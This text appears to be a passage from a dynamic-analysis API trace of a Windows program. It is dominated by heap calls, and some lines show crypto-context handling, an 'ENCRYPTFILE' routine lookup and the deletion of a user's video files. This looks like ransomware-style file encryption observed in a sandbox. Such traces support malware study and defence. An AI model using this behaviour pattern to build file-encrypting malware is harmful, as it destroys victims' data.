lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0103.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.299] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0103.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.299] FreeLibrary (hLibModule=0x756e0000) returned 1 [0103.299] CloseHandle (hObject=0x258) returned 1 [0103.299] CloseHandle (hObject=0x298) returned 1 [0103.300] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi", lpFilePart=0x0) returned 0x49 [0103.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\333uerw2sj.avi")) returned 0x20 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0103.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981f43e0, ftCreationTime.dwHighDateTime=0x1d5ee5e, ftLastAccessTime.dwLowDateTime=0xf6d94300, ftLastAccessTime.dwHighDateTime=0x1d5ed5e, ftLastWriteTime.dwLowDateTime=0xf6d94300, ftLastWriteTime.dwHighDateTime=0x1d5ed5e, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="333uErW2SJ.avi", cAlternateFileName="333UER~1.AVI")) returned 0x41ac280 [0103.301] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\333uerw2sj.avi")) returned 1 [0103.349] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981f43e0, ftCreationTime.dwHighDateTime=0x1d5ee5e, ftLastAccessTime.dwLowDateTime=0xf6d94300, ftLastAccessTime.dwHighDateTime=0x1d5ed5e, ftLastWriteTime.dwLowDateTime=0xf6d94300, ftLastWriteTime.dwHighDateTime=0x1d5ed5e, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="333uErW2SJ.avi", cAlternateFileName="333UER~1.AVI")) returned 0 [0103.349] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7710 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0103.349] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0103.349] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0103.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0103.350] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.350] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0103.350] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0103.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0103.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43cc1c8 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0103.351] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0103.351] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.352] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59e5170, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0x3b529e30, ftLastAccessTime.dwHighDateTime=0x1d5e58c, ftLastWriteTime.dwLowDateTime=0x3b529e30, ftLastWriteTime.dwHighDateTime=0x1d5e58c, nFileSizeHigh=0x0, nFileSizeLow=0xbcb7, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="c1tN0jRrSKz9_ 3.mkv", cAlternateFileName="C1TN0J~1.MKV")) returned 0x41ac540 [0103.352] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0103.352] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0103.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0103.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0103.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0103.353] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0103.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0103.353] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0103.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0103.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2820 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0103.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.355] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 